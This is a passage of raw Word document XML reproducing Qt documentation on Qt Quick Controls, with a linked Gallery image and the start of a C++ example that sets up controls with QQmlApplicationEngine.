      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For an overview of the controls provided by</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId548" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, you can look at the</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId549" w:history="1">
        <w:r w:rsidRPr="00B42CD3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Gallery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B42CD3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B42CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png"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"http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1036" type="#_x0000_t75" alt="" style="width:280.5pt;height:274.2pt">
            <v:imagedata r:id="rId550" r:href="rId551"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="732" w:name="setting-up-controls-from-c"/>
      <w:bookmarkStart w:id="733" w:name="_Toc483000686"/>
      <w:bookmarkStart w:id="734" w:name="_Toc483003703"/>
      <w:bookmarkStart w:id="735" w:name="_Toc483604038"/>
      <w:bookmarkStart w:id="736" w:name="_Toc483605258"/>
      <w:bookmarkEnd w:id="732"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting Up Controls from C++</w:t>
      </w:r>
      <w:bookmarkEnd w:id="733"/>
      <w:bookmarkEnd w:id="734"/>
      <w:bookmarkEnd w:id="735"/>
      <w:bookmarkEnd w:id="736"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Although we have traditionally used a</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId552" w:history="1">
        <w:r w:rsidRPr="00B42CD3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">window to display QML files in a C++ application, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>doing this means you can only set window properties from C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With Qt Quick Controls, declare an</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId553" w:history="1">
        <w:r w:rsidRPr="00B42CD3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ApplicationWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as the root item of your application and launch it by using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId554" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlApplicationEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instead. This ensures that you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00B42CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>control top level window properties from QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A basic example of a source file that makes use of controls is shown here:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlApplicationEngine</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
